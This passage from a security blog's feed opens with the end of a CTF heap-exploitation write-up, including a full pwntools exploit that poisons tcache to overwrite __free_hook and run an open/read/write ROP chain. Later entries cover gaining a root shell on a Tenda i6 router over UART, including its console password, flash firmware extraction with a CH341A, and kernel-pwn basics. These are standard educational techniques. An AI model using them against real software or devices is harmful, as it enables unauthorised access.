class="hljs-selector-class">.sym</span><span class="hljs-selector-attr">[<span class="hljs-string">'__malloc_hook'</span>]</span><br>free_hook=libcbase+libc<span class="hljs-selector-class">.sym</span><span class="hljs-selector-attr">[<span class="hljs-string">'__free_hook'</span>]</span><br>setcontext=libcbase+libc<span class="hljs-selector-class">.sym</span><span class="hljs-selector-attr">[<span class="hljs-string">'setcontext'</span>]</span>+<span class="hljs-number">53</span><br>pop_rdi=<span class="hljs-number">0</span>x000000000002164f+libcbase<br>pop_rsi=<span class="hljs-number">0</span>x0000000000023a6a+libcbase<br>pop_rdx=<span class="hljs-number">0</span>x0000000000001b96+libcbase<br>ret=libcbase+<span class="hljs-number">0</span>x00000000000008aa<br><br>open=libcbase+libc<span class="hljs-selector-class">.sym</span><span class="hljs-selector-attr">[<span 
class="hljs-string">'open'</span>]</span><br>read=libcbase+libc<span class="hljs-selector-class">.sym</span><span class="hljs-selector-attr">[<span class="hljs-string">'read'</span>]</span><br>write=libcbase+libc<span class="hljs-selector-class">.sym</span><span class="hljs-selector-attr">[<span class="hljs-string">'write'</span>]</span><br></code></pre></td></tr></table></figure><p>Leak a heap address and overwrite free_hook with setcontext</p><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs stylus"><span class="hljs-function"><span class="hljs-title">add</span><span class="hljs-params">(<span class="hljs-number">0</span>x410,b<span class="hljs-string">'AAAA'</span>)</span></span>#<span class="hljs-number">2</span><br><br><span class="hljs-function"><span class="hljs-title">add</span><span class="hljs-params">(<span class="hljs-number">0</span>x60,b<span class="hljs-string">'AAAA'</span>)</span></span>#<span class="hljs-number">3</span><br><span class="hljs-function"><span class="hljs-title">add</span><span class="hljs-params">(<span class="hljs-number">0</span>x70,b<span class="hljs-string">'AAAA'</span>)</span></span>#<span class="hljs-number">4</span><br><span class="hljs-function"><span class="hljs-title">add</span><span class="hljs-params">(<span class="hljs-number">0</span>x70,b<span class="hljs-string">'AAAA'</span>)</span></span>#<span class="hljs-number">5</span><br><br><span 
class="hljs-function"><span class="hljs-title">delete</span><span class="hljs-params">(<span class="hljs-number">3</span>)</span></span><br><span class="hljs-function"><span class="hljs-title">delete</span><span class="hljs-params">(<span class="hljs-number">4</span>)</span></span><br><span class="hljs-function"><span class="hljs-title">delete</span><span class="hljs-params">(<span class="hljs-number">5</span>)</span></span><br><br><span class="hljs-function"><span class="hljs-title">show</span><span class="hljs-params">(<span class="hljs-number">5</span>)</span></span><br>heapbase=<span class="hljs-built_in">uheap</span>()-<span class="hljs-number">0</span>x710<br><span class="hljs-function"><span class="hljs-title">lg</span><span class="hljs-params">(<span class="hljs-string">"heapbase"</span>)</span></span><br><br><span class="hljs-function"><span class="hljs-title">edit</span><span class="hljs-params">(<span class="hljs-number">3</span>,p64(free_hook)</span></span>)<br><span class="hljs-function"><span class="hljs-title">add</span><span class="hljs-params">(<span class="hljs-number">0</span>x60,b<span class="hljs-string">'AAAA'</span>)</span></span>#<span class="hljs-number">6</span><br><span class="hljs-function"><span class="hljs-title">add</span><span class="hljs-params">(<span class="hljs-number">0</span>x60,p64(setcontext)</span></span>)#<span class="hljs-number">7</span><br></code></pre></td></tr></table></figure><p>Lay out the orw chain; freeing the corresponding chunk makes rdi point to that heap address, so control passes to the orw chain</p><figure class="highlight stylus"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td 
class="code"><pre><code class="hljs stylus">heap=heapbase+<span class="hljs-number">0</span>x260<br>flag_addr=heap+<span class="hljs-number">0</span>x300<br>orw_addr=heap+<span class="hljs-number">0</span>xb0<br>orw=<span class="hljs-built_in">p64</span>(pop_rdi)+<span class="hljs-built_in">p64</span>(heap)+<span class="hljs-built_in">p64</span>(pop_rsi)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">0</span>)+<span class="hljs-built_in">p64</span>(open)<br>orw+=<span class="hljs-built_in">p64</span>(pop_rdi)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">3</span>)+<span class="hljs-built_in">p64</span>(pop_rsi)+<span class="hljs-built_in">p64</span>(flag_addr)+<span class="hljs-built_in">p64</span>(pop_rdx)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">0</span>x50)+<span class="hljs-built_in">p64</span>(read)<br>orw+=<span class="hljs-built_in">p64</span>(pop_rdi)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">1</span>)+<span class="hljs-built_in">p64</span>(pop_rsi)+<span class="hljs-built_in">p64</span>(flag_addr)+<span class="hljs-built_in">p64</span>(pop_rdx)+<span class="hljs-built_in">p64</span>(<span class="hljs-number">0</span>x50)+<span class="hljs-built_in">p64</span>(write)<br>payload=b<span class="hljs-string">'./flag\x00'</span><span class="hljs-selector-class">.ljust</span>(<span class="hljs-number">0</span>xa0,b<span class="hljs-string">'\x00'</span>)<br>payload+=<span class="hljs-built_in">p64</span>(orw_addr)+<span class="hljs-built_in">p64</span>(ret)+orw<br><br><span class="hljs-function"><span class="hljs-title">edit</span><span class="hljs-params">(<span class="hljs-number">2</span>,payload)</span></span><br><span class="hljs-function"><span class="hljs-title">delete</span><span class="hljs-params">(<span class="hljs-number">2</span>)</span></span><br><br><span class="hljs-function"><span class="hljs-title">ia</span><span 
class="hljs-params">()</span></span><br></code></pre></td></tr></table></figure><p>Full exploit:</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span 
class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-keyword">from</span> pwn import *<br><span class="hljs-keyword">from</span> ctypes 
import *<br><span class="hljs-keyword">from</span> struct import pack<br>banary = <span class="hljs-string">"./orw_h1"</span><br>elf = ELF(banary)<br><span class="hljs-comment">#libc = ELF("./libc.so.6")</span><br><span class="hljs-attribute">libc</span>=ELF("/home/youlin/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc.so.6")<span class="hljs-built_in"></span><br><span class="hljs-built_in">ip </span>= <span class="hljs-string">''</span><span class="hljs-built_in"></span><br><span class="hljs-built_in">port </span>= 0<br>local = 1<br><span class="hljs-keyword">if</span> local:<br> io = process(banary)<br><span class="hljs-keyword">else</span>:<br> io = remote(ip, port)<br><br>context(log_level = <span class="hljs-string">'debug'</span>, os = <span class="hljs-string">'linux'</span>, arch = <span class="hljs-string">'amd64'</span>)<br><span class="hljs-comment">#context(log_level = 'debug', os = 'linux', arch = 'i386')</span><br><br>def dbg():<br> gdb.attach(io)<br> pause()<br><br>s = lambda data : io.send(data)<br>sl = lambda data : io.sendline(data)<br>sa = lambda text, data : io.sendafter(text, data)<br>sla = lambda text, data : io.sendlineafter(text, data)<br>r = lambda : io.recv()<br>ru = lambda text : io.recvuntil(text)<br>uu32 = lambda : u32(io.recvuntil(b<span class="hljs-string">"\xff"</span>)[-4:].ljust(4, b<span class="hljs-string">'\x00'</span>))<br>uu64 = lambda : u64(io.recvuntil(b<span class="hljs-string">"\x7f"</span>)[-6:].ljust(8, b<span class="hljs-string">"\x00"</span>))<br>iuu32 = lambda : int(io.recv(10),16)<br>iuu64 = lambda : int(io.recv(6),16)<br>uheap = lambda : u64(io.recv(6).ljust(8,b<span class="hljs-string">'\x00'</span>))<br>lg = lambda data : io.success(<span class="hljs-string">'%s -> 0x%x'</span> % (data, eval(data)))<br>ia = lambda : io.interactive()<br><br>def cmd(choice):<br> ru(<span class="hljs-string">">> "</span>)<br> sl(str(choice))<br><br>def <span class="hljs-built_in">add</span>(size,content):<br> cmd(1)<br> ru(<span 
class="hljs-string">"Length of game description:"</span>)<br> sl(str(size))<br> ru(<span class="hljs-string">"Game description:"</span>)<br> s(content)<br><br>def delete(index):<br> cmd(2)<br> ru(<span class="hljs-string">"game index: "</span>)<br> sl(str(index))<br><br>def <span class="hljs-built_in">edit</span>(index,content):<br> cmd(3)<br> ru(<span class="hljs-string">"game index: "</span>)<br> sl(str(index))<br> ru(<span class="hljs-string">"Edit Game description:"</span>)<br> s(content)<br><br>def show(index):<br> cmd(4)<br> ru(<span class="hljs-string">"game index: "</span>)<br> sl(str(index))<br><br><span class="hljs-built_in">add</span>(0x410,b<span class="hljs-string">'AAAA'</span>)#0<br><span class="hljs-built_in">add</span>(0x10,b<span class="hljs-string">'AAAA'</span>)#1<br>delete(0)<br>show(0)<br><span class="hljs-attribute">libcbase</span>=uu64()-0x3ebca0<br>lg(<span class="hljs-string">"libcbase"</span>)<br><span class="hljs-attribute">malloc_hook</span>=libcbase+libc.sym[<span class="hljs-string">'__malloc_hook'</span>]<br><span class="hljs-attribute">free_hook</span>=libcbase+libc.sym[<span class="hljs-string">'__free_hook'</span>]<br><span class="hljs-attribute">setcontext</span>=libcbase+libc.sym[<span class="hljs-string">'setcontext'</span>]+53<br><span class="hljs-attribute">pop_rdi</span>=0x000000000002164f+libcbase<br><span class="hljs-attribute">pop_rsi</span>=0x0000000000023a6a+libcbase<br><span class="hljs-attribute">pop_rdx</span>=0x0000000000001b96+libcbase<br><span class="hljs-attribute">ret</span>=libcbase+0x00000000000008aa<br><br><span class="hljs-attribute">open</span>=libcbase+libc.sym[<span class="hljs-string">'open'</span>]<br><span class="hljs-attribute">read</span>=libcbase+libc.sym[<span class="hljs-string">'read'</span>]<br><span class="hljs-attribute">write</span>=libcbase+libc.sym[<span class="hljs-string">'write'</span>]<br><br><br><span class="hljs-built_in">add</span>(0x410,b<span 
class="hljs-string">'AAAA'</span>)#2<br><br><span class="hljs-built_in">add</span>(0x60,b<span class="hljs-string">'AAAA'</span>)#3<br><span class="hljs-built_in">add</span>(0x70,b<span class="hljs-string">'AAAA'</span>)#4<br><span class="hljs-built_in">add</span>(0x70,b<span class="hljs-string">'AAAA'</span>)#5<br><br>delete(3)<br>delete(4)<br>delete(5)<br><br>show(5)<br><span class="hljs-attribute">heapbase</span>=uheap()-0x710<br>lg(<span class="hljs-string">"heapbase"</span>)<br><br><span class="hljs-built_in">edit</span>(3,p64(free_hook))<br><span class="hljs-built_in">add</span>(0x60,b<span class="hljs-string">'AAAA'</span>)#6<br><span class="hljs-built_in">add</span>(0x60,p64(setcontext))#7<br><br><span class="hljs-attribute">heap</span>=heapbase+0x260<br><span class="hljs-attribute">flag_addr</span>=heap+0x300<br><span class="hljs-attribute">orw_addr</span>=heap+0xb0<br><span class="hljs-attribute">orw</span>=p64(pop_rdi)+p64(heap)+p64(pop_rsi)+p64(0)+p64(open)<br>orw+=p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(flag_addr)+p64(pop_rdx)+p64(0x50)+p64(read)<br>orw+=p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(flag_addr)+p64(pop_rdx)+p64(0x50)+p64(write)<br><span class="hljs-attribute">payload</span>=b'./flag\x00'.ljust(0xa0,b'\x00')<br>payload+=p64(orw_addr)+p64(ret)+orw<br><br><span class="hljs-built_in">edit</span>(2,payload)<br>delete(2)<br><br>ia()<br></code></pre></td></tr></table></figure>]]></content>
</entry>
<entry>
<title>Tenda-i6路由器UART调试</title>
<link href="/2023/09/28/Tenda-i6%E8%B7%AF%E7%94%B1%E5%99%A8UART%E8%B0%83%E8%AF%95/"/>
<url>/2023/09/28/Tenda-i6%E8%B7%AF%E7%94%B1%E5%99%A8UART%E8%B0%83%E8%AF%95/</url>
<content type="html"><![CDATA[<h1 id="需要的工具"><a href="#需要的工具" class="headerlink" title="Tools required"></a>Tools required</h1><p>Multimeter, Dupont wires (50 male-to-female, 50 female-to-female), the router, a TTL adapter</p><h1 id="接口介绍"><a href="#接口介绍" class="headerlink" title="Interface overview"></a>Interface overview</h1><p>In embedded work, "serial port" usually means the UART port. There are also COM ports and TTL; here is a brief explanation of what they are and how they relate.</p><ul><li>UART: universal asynchronous receiver/transmitter. In embedded systems the serial port is in fact the UART port, with 4 pins</li><li>COM port: the port commonly found on desktop PCs, 9 pins; only two interface protocols, RS232 and RS485</li></ul><p>UART port and COM port refer to the physical connector; TTL, RS232 and RS485 refer to the voltage-level standard</p><p>Embedded systems commonly use TTL levels, i.e. 3.3V or 5.0V</p><h1 id="UART接口介绍"><a href="#UART接口介绍" class="headerlink" title="UART interface"></a>UART interface</h1><p>A UART has only receive and transmit data lines and no clock line, so it is an asynchronous serial interface and supports full-duplex communication. In embedded systems it is commonly used for communication between a control system and peripherals, including controller-to-controller and controller-to-terminal-device links. A UART has at least 4 pins: the common ground GND, the power pin VCC, the output pin TXD and the receive pin RXD.</p><ul><li><strong>VCC:</strong> power pin, usually 3.3V. With the board powered there is no overcurrent protection, so it is safer not to connect this pin</li><li><strong>GND:</strong> ground pin. Sometimes RX has trouble receiving data and this pin has to be connected; usually it can be left unconnected #on the i6 this was the only pin I could identify by measurement</li><li><strong>RX:</strong> receive data pin</li><li><strong>TX:</strong> transmit data pin</li></ul><h1 id="寻找UART并定位"><a href="#寻找UART并定位" class="headerlink" title="Finding and identifying the UART"></a>Finding and identifying the UART</h1><p>Front of the board after opening the router</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309282015137.png" alt="image-20230928201539907"></p><p>The UART header is the spot circled in red below</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309282017375.jpg" alt="IMG_20230928_201444"></p><h2 id="定位GND"><a href="#定位GND" class="headerlink" title="Identifying GND"></a>Identifying GND</h2><p>Turn the multimeter to continuity (buzzer) mode and put the black probe on the power supply solder point on the back of the board</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309282020018.png" alt="image-20230928202003855"></p><p>Touch the red probe to each of the four UART pads; the one that makes the meter beep and light up red is GND</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309282025553.png" alt="image-20230928202515259"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309282026564.jpg" alt="IMG_20230928_202334"></p><h2 id="定位VCC"><a href="#定位VCC" class="headerlink" 
title="Identifying VCC"></a>Identifying VCC</h2><p>Set the multimeter to the 20V range, put the black probe on the pad just identified as GND, and test the other three UART pins with the red probe; the pin reading around 3.3V is VCC. (Note that the board must be powered for this test, and for all the following steps.) The other two pins both read 2.29V for me; at first I assumed it was measurement error since they were identical, but after asking z1r0 I learned this is normal</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309282032307.jpg" alt="IMG_20230928_203012"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309282032936.jpg" alt="IMG_20230928_203001"></p><h2 id="定位TXD"><a href="#定位TXD" class="headerlink" title="Identifying TXD"></a>Identifying TXD</h2><p>While the router boots and transmits data, the voltage on this pin changes, and that property lets us identify TXD. I could not manage it one-handed, so no photo here; it is much like the above: black probe on GND, then reboot the router and test the second and third pins. The third one changes, so the third pin is TXD. It changes quickly, but comparing the two makes it visible: the TXD pin first jumps to about 2.7V and then to 3.29V, while the other pin, RXD, jumps straight to 3.29V</p><h2 id="定位RXD"><a href="#定位RXD" class="headerlink" title="Identifying RXD"></a>Identifying RXD</h2><p>Only the fourth pin remains, so it is naturally RXD. If there were five pins, you can connect GND and TXD to the TTL adapter, plug it into the computer and test the remaining pins one by one, checking whether typed input is echoed back; crude but effective. (When I initially failed to identify VCC, I also used this method of plugging straight into the computer to test)</p><h1 id="将杜邦线插入UART口以及TTL转接"><a href="#将杜邦线插入UART口以及TTL转接" class="headerlink" title="Connecting the Dupont wires to the UART header and the TTL adapter"></a>Connecting the Dupont wires to the UART header and the TTL adapter</h1><p>Note that the router's RXD and TXD must be cross-connected to the adapter's RX and TX, and GND must be connected correctly</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309282120902.jpg" alt="IMG_20230928_211905"></p><h1 id="获取cli"><a href="#获取cli" class="headerlink" title="Getting a CLI"></a>Getting a CLI</h1><p>The software used here is SecureCRT. After opening it, click Session Manager on the left, then the + sign to add a session with the settings selected in the image below</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309282122648.png" alt="image-20230928212207616"></p><p>After a few tries the baud rate turned out to be 115200, a baud rate Tenda commonly uses</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309282122528.png" alt="image-20230928212247500"></p><p>Once the session is open, connect the TTL adapter to the computer and plug in the router's power; the router's boot messages appear</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309282125466.png" alt="image-20230928212527436"></p><p>Press Enter a few times and it asks for a password; the password is: Fireitup (huge thanks to z1r0)</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309282126672.png" 
alt="image-20230928212648642"></p><p>From there you can work out a way to use telnetd to transfer files to your own machine</p>]]></content>
</entry>
<entry>
<title>CH341A编程器固件提取</title>
<link href="/2023/09/25/CH341A%E7%BC%96%E7%A8%8B%E5%99%A8%E5%9B%BA%E4%BB%B6%E6%8F%90%E5%8F%96/"/>
<url>/2023/09/25/CH341A%E7%BC%96%E7%A8%8B%E5%99%A8%E5%9B%BA%E4%BB%B6%E6%8F%90%E5%8F%96/</url>
<content type="html"><![CDATA[<h1 id="工具准备"><a href="#工具准备" class="headerlink" title="Tools"></a>Tools</h1><p>Tools to prepare:</p><ul><li>CH341A programmer</li><li>SOP8 test clip</li><li>Adapter board</li></ul><p>Bought on Taobao; when ordering, choose the CH341A programmer + SOP8 option</p><p>Link: [Taobao] <a href="https://m.tb.cn/h.5fSe8GU?tk=kziqdBrefoZ">https://m.tb.cn/h.5fSe8GU?tk=kziqdBrefoZ</a> CZ0001</p><h1 id="组装"><a href="#组装" class="headerlink" title="Assembly"></a>Assembly</h1><p>The purchase comes with the two items below</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252054631.png" alt="image-20230925205426499"></p><p>Connect the adapter board to the CH341A programmer (be careful not to plug it in the wrong way)</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252053909.png" alt="image-20230925205317786"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252055888.png" alt="image-20230925205516761"></p><p>That completes assembly</p><h1 id="CH341A驱动安装"><a href="#CH341A驱动安装" class="headerlink" title="Installing the CH341A driver"></a><strong>Installing the CH341A driver</strong></h1><p>I am on Windows 10 here, and AsProgrammer throws an error when reading the firmware</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252050556.png" alt="Untitled"></p><p>Download and install the driver below</p><p><a href="https://www.wch.cn/downloads/CH341SER_EXE.html">https://www.wch.cn/downloads/CH341SER_EXE.html</a></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252050567.png" alt="Untitled"></p><p>Just click install. After installation, right-click Computer, click Manage, find the CH341A USB device (remember to plug it into the computer), right-click it, then Properties, Driver, Update Driver, and click Browse my computer for drivers</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252058504.png" alt="image-20230925205800477"></p><p>Then click "Let me pick from a list of available drivers on my computer", find Ports (COM &amp; LPT),<br>then look for wch.cn and select the matching CH341A</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252050584.png" alt="Untitled"></p><p>Then Next, continue; once done, the CH341A appears under Ports (COM &amp; LPT) in Device Manager.<br>But it still does not work. Next open Settings, Windows Update, click View all optional updates, and find wch.cn under Driver updates</p><p><img 
src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252110018.png" alt="image-20230925205813472"></p><p>Tick it, then download and install</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252050719.png" alt="Untitled"></p><p>After installation the CH341A appears under external interfaces<br>Driver installation is now complete</p><h1 id="固件提取"><a href="#固件提取" class="headerlink" title="Firmware extraction"></a><strong>Firmware extraction</strong></h1><p>You may also need a screwdriver and a pry tool to open the router</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252057648.png" alt="image-20230925205714576"></p><p>First find the flash chip</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252110694.png" alt="image-20230925211026622"></p><p>You will notice a small dot on the flash chip; it corresponds to the position of the red wire on the clip. After clipping it on, check whether the light on the front of the router comes on</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252050384.png" alt="Untitled"></p><p>Then open AsProgrammer, download: <a href="https://github.com/YTEC-info/CH341A-Softwares">https://github.com/YTEC-info/CH341A-Softwares</a></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252050305.png" alt="Untitled"></p><p>Click auto-detect; on success it pops up the chip model. The exact model is printed on the flash chip, but picking any one of the offered models makes little difference. Then click Select IC, then Read IC</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252050718.png" alt="Untitled"></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252050675.png" alt="Untitled"></p><p>The progress bar at the bottom shows the firmware being read</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252050747.png" alt="Untitled"></p><p>Once reading finishes you can save the firmware</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202309252050164.png" alt="Untitled"></p><p>Firmware extraction is complete</p>]]></content>
</entry>
<entry>
<title>kernel初探</title>
<link href="/2023/09/25/kernel%E5%88%9D%E6%8E%A2/"/>
<url>/2023/09/25/kernel%E5%88%9D%E6%8E%A2/</url>
<content type="html"><![CDATA[<h1 id="kernel"><a href="#kernel" class="headerlink" title="kernel"></a><strong>kernel</strong></h1>
<p>The kernel is itself a program: it takes the I/O requests issued by software, translates them into instructions, and hands them to the CPU and the other components of the machine. It is the most fundamental part of a modern operating system.<br>Its two main jobs are:</p>
<ol><li>controlling and interacting with the hardware</li><li>providing the environment in which applications run</li></ol>
<p>I/O, access control, system calls, process management, memory management and so on all fall under those two points.<br>Note that <strong>a kernel crash usually causes a reboot</strong>.</p>
<p>Kernel challenges in pwn are usually about privilege escalation: call commit_creds(&amp;init_cred) or commit_creds(prepare_kernel_cred(NULL)), then return to user mode and spawn a shell, and you have root.</p>
<h1 id="Ring-Model"><a href="#Ring-Model" class="headerlink" title="Ring Model"></a><strong>Ring Model</strong></h1>
<p>Intel CPUs divide privilege into four levels: Ring 0, Ring 1, Ring 2 and Ring 3.<br>Ring 0 is reserved for the OS, Ring 3 is usable by every program, and an inner ring may freely use the resources of the outer rings.<br>The ring model exists to improve system security: spyware running as a Ring 3 user program, for example, is stopped from turning on the camera without telling the user, because accessing the hardware requires methods reserved to drivers in Ring 1.<br>Most modern operating systems use only Ring 0 and Ring 3.</p>
<h1 id="Loadable-Kernel-Modules-LKMs"><a href="#Loadable-Kernel-Modules-LKMs" class="headerlink" title="Loadable Kernel Modules(LKMs)"></a><strong>Loadable Kernel Modules (LKMs)</strong></h1>
<p>Loadable kernel modules (or simply kernel modules) are like executables that run in kernel space. They include:</p>
<ul><li>device drivers<ul><li>hardware device drivers</li><li>file system drivers</li><li>…</li></ul></li><li>kernel extension modules</li></ul>
<p>LKMs use the same file format as user-space executables: ELF on Linux, exe/dll on Windows, Mach-O on macOS, so tools such as IDA can analyse them.<br>A module can be compiled separately but cannot run on its own: at run time it is linked into the kernel and runs in kernel space as part of it, unlike a process running in user space.<br>Modules typically implement a file system, a driver, or some other functionality layered on top of the kernel.</p>
<p>In kernel pwn challenges the vulnerability usually lives in a driver, i.e. an xxx.ko file. The init script in the file system tells you which file that is, and editing that init script is also how you give yourself root inside the qemu VM so that later debugging is easier.</p>
<h3 id="相关指令"><a href="#相关指令" class="headerlink" title="相关指令"></a><strong>Related commands</strong></h3>
<ul><li><strong>insmod</strong>: load the given module into the kernel</li><li><strong>rmmod</strong>: unload the given module from the kernel</li><li><strong>lsmod</strong>: list the loaded modules</li><li><strong>modprobe</strong>: add or remove a module; modprobe resolves dependencies when loading</li></ul>
<h1 id="syscall"><a href="#syscall" class="headerlink" title="syscall"></a><strong>syscall</strong></h1>
<p>A system call is a request from a user-space program to the kernel for a service that needs higher privilege, such as I/O or inter-process communication. System calls are the interface between user programs and the operating system; some library functions (I/O functions such as scanf and puts, for instance) are really wrappers around system calls (read and write).</p>
<h1 id="ioctl"><a href="#ioctl" class="headerlink" title="ioctl"></a><strong>ioctl</strong></h1>
<p>Straight from the man page:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><code class="hljs plaintext">NAME<br>       ioctl - control device<br><br>SYNOPSIS<br>       #include &lt;sys/ioctl.h&gt;<br><br>       int ioctl(int fd, unsigned long request, ...);<br><br>DESCRIPTION<br>       The ioctl() system call manipulates the underlying device parameters of special<br>       files.  In particular, many operating characteristics of character special<br>       files (e.g., terminals) may be controlled with ioctl() requests.  The argument<br>       fd must be an open file descriptor.<br><br>       The second argument is a device-dependent request code.  The third argument is<br>       an untyped pointer to memory.  It's traditionally char *argp (from the days<br>       before void * was valid C), and will be so named for this discussion.<br><br>       An ioctl() request has encoded in it whether the argument is an in parameter or<br>       out parameter, and the size of the argument argp in bytes.  Macros and defines<br>       used in specifying an ioctl() request are located in the file &lt;sys/ioctl.h&gt;.<br></code></pre></td></tr></table></figure>
<p>So ioctl is also a system call, used to talk to devices.<br>In int ioctl(int fd, unsigned long request, …), the first argument is the <a href="http://m4x.fun/post/play-with-file-descriptor-1/">file descriptor</a> returned by open(), the second is the control command the user program sends to the device, and any further arguments are device-specific extras.</p>
<h1 id="状态切换"><a href="#状态切换" class="headerlink" title="状态切换"></a><strong>Mode switching</strong></h1>
<h2 id="user-space-to-kernel-space"><a href="#user-space-to-kernel-space" class="headerlink" title="user space to kernel space"></a><strong>user space to kernel space</strong></h2>
<p>A switch from user mode to kernel mode happens on a system call, an exception, an external interrupt and similar events. The steps are:</p>
<ol><li>swapgs swaps the GS segment register with the value stored at a fixed location; this saves the user GS value and installs the kernel's GS value in one step.</li><li>The current (user) stack pointer is recorded in a per-CPU variable, and the kernel stack pointer recorded in the per-CPU area is loaded into rsp/esp.</li><li>The registers are saved with push; the relevant <a href="http://elixir.free-electrons.com/linux/v4.12/source/arch/x86/entry/entry_64.S">code</a> is:</li></ol>
